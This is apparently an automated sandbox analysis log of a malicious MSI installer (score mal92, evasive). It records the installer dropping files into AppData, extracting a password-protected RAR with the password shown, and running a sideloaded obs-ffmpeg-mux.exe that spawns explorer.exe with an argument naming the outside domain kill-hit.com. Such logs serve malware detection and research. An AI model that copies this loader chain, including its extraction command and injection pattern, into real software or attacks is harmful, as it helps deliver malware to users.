Source: api-ms-win-core-datetime-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
Source: api-ms-win-core-processthreads-l1-1-1.dll.2.drStatic PE information: No import functions for PE file found
Source: K064a7Rfk7.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs K064a7Rfk7.msi
Source: K064a7Rfk7.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs K064a7Rfk7.msi
Source: K064a7Rfk7.msiBinary or memory string: OriginalFilenameucrtbase.dllj% vs K064a7Rfk7.msi
Source: K064a7Rfk7.msiBinary or memory string: OriginalFilenamevcruntime140.dllT vs K064a7Rfk7.msi
Source: K064a7Rfk7.msiBinary or memory string: OriginalFilenamemsvcp140.dllT vs K064a7Rfk7.msi
Source: K064a7Rfk7.msiBinary or memory string: OriginalFilenameMicrosoft.Web.WebView2.Core.dll vs K064a7Rfk7.msi
Source: K064a7Rfk7.msiBinary or memory string: OriginalFilenameMicrosoft.UI.Xaml.dllD vs K064a7Rfk7.msi
Source: K064a7Rfk7.msiBinary or memory string: OriginalFilenameembeddeduiproxy.dllF vs K064a7Rfk7.msi
Source: classification engineClassification label: mal92.evad.winMSI@16/80@1/1
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACC0C68 GetLastError,FormatMessageW,LocalFree,5_2_00007FF7AACC0C68
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACC3C48 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,5_2_00007FF7AACC3C48
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACE2740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,SetSuspendState,ExitWindowsEx,5_2_00007FF7AACE2740
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCB22C GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn,5_2_00007FF7AACCB22C
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeCode function: 5_2_00007FF7AACCDE20 CoCreateInstance,CoSetProxyBlanket,VariantClear,5_2_00007FF7AACCDE20
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeCode function: 7_2_00007FFDA378A720 OutputDebugStringA,OutputDebugStringA,PowerClearRequest,GetTapePosition,CloseThreadpool,CloseThreadpoolTimer,GetUserDefaultLangID,LoadResource,GetFileAttributesTransactedW,PtInRegion,GetFinalPathNameByHandleW,AddFontResourceW,GetTextCharset,GetActiveProcessorGroupCount,GetTapePosition,GetWindowOrgEx,SelectObject,SetFileApisToOEM,CreateFontIndirectExW,CreateJobObjectW,IsDBCSLeadByteEx,GetConsoleCP,CreateThreadpoolWork,GetProcessWorkingSetSizeEx,RemoveDllDirectory,SetThreadPreferredUILanguages,DuplicateHandle,GetDefaultCommConfigW,CreateHardLinkW,DefineDosDeviceW,AddVectoredExceptionHandler,ReleaseMutex,GetUserGeoID,IsBadStringPtrW,GetTickCount64,TerminateJobObject,VerifyScripts,GetFileAttributesExW,GlobalMemoryStatusEx,7_2_00007FFDA378A720
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CML2FC.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4896:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3004:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeMutant created: \Sessions\1\BaseNamedObjects\ycsepmubxbtwkolmtv
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_03
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFA969DD5B00E89354.TMPJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeCommand line argument: kill-hit.com11_2_00C01020
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: obs-ffmpeg-mux.exeString found in binary or memory: start/stop audio
Source: obs-ffmpeg-mux.exeString found in binary or memory: start/stop audio
Source: obs-ffmpeg-mux.exeString found in binary or memory: #EXT-X-START value isinvalid, it will be ignored
Source: obs-ffmpeg-mux.exeString found in binary or memory: #EXT-X-START:
Source: obs-ffmpeg-mux.exeString found in binary or memory: prefer to use #EXT-X-START if it's in playlist instead of live_start_index
Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\K064a7Rfk7.msi"
Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E85F61D79C141FA458D0DA7A80AAA4F
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe" x -p3809610121t -o+ "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\iwhgjds.rar" "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\"
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe"
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe"
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe explorer.exe
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1836 -s 256
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6E85F61D79C141FA458D0DA7A80AAA4FJump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exe" x -p3809610121t -o+ "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\iwhgjds.rar" "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\"Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exe"Jump to behavior
Source: C:\Windows\System32\msiexec.exeProcess created: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe "C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exe"Jump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe explorer.exeJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: obs.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: avcodec-60.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: avutil-58.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: avformat-60.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: w32-pthreads.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: avutil-58.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: swresample-4.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\obs-ffmpeg-mux.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\createdump.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Barsoc Quite Sols\Joas App\UnRar.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\msiexec.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7C382357-94C2-4F1A-B1DD-2EBBA0F0B9A9}Jump to behavior
Source: K064a7Rfk7.msiStatic file information: File size 59426257 > 1048576
Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\debug\createdump\createdump.pdb source: createdump.exe, 00000008.00000002.2309946294.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp, createdump.exe, 00000008.00000000.2304497963.00007FF7C76D8000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\ReleaseAI\win\Release\bin\x86\embeddeduiproxy.pdb= source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb)) source: K064a7Rfk7.msi
Source: Binary string: ucrtbase.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.2.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.2.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: api-ms-win-core-debug-l1-1-0.dll.2.dr
Source: Binary string: Microsoft.Web.WebView2.Core.pdbGCTL source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdbm source: K064a7Rfk7.msi
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcamp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: K064a7Rfk7.msi
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vccorlib140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\WinUiBootstrapperEui\WinUiBootstrapperEui.pdb source: K064a7Rfk7.msi
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.2.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.2.dr
Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\msvcp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
Source: Binary string: D:\releases\dva\shared\adobe\utest\lib\win\release\64\utest.pdb source: utest.dll.2.dr
Source: Binary string: E:\BA\201\s\140_release\vcrt_fwd_x86_release\Release\vcomp140_app.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\1\s\Win32\Release\Microsoft.Toolkit.Win32.UI.XamlApplication\Microsoft.Toolkit.Win32.UI.XamlHost.pdb!! source: K064a7Rfk7.msi
Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: obs-ffmpeg-mux.exe, 00000007.00000002.2338386873.00007FFDAC131000.00000002.00000001.01000000.0000000C.sdmp, vcruntime140.dll.2.dr
Source: Binary string: D:\releases\dva\shared\adobe\utest\lib\win\release\64\utest.pdb((! source: utest.dll.2.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.2.dr
Source: Binary string: C:\a\_work\1\s\BuildOutput\Release\x86\Microsoft.UI.Xaml\Microsoft.UI.Xaml.pdb source: K064a7Rfk7.msi
Source: Binary string: D:\a\_work\1\s\140_release\vcrt_fwd_x86_release\Release\vcruntime140_app.pdb source: K064a7Rfk7.msi
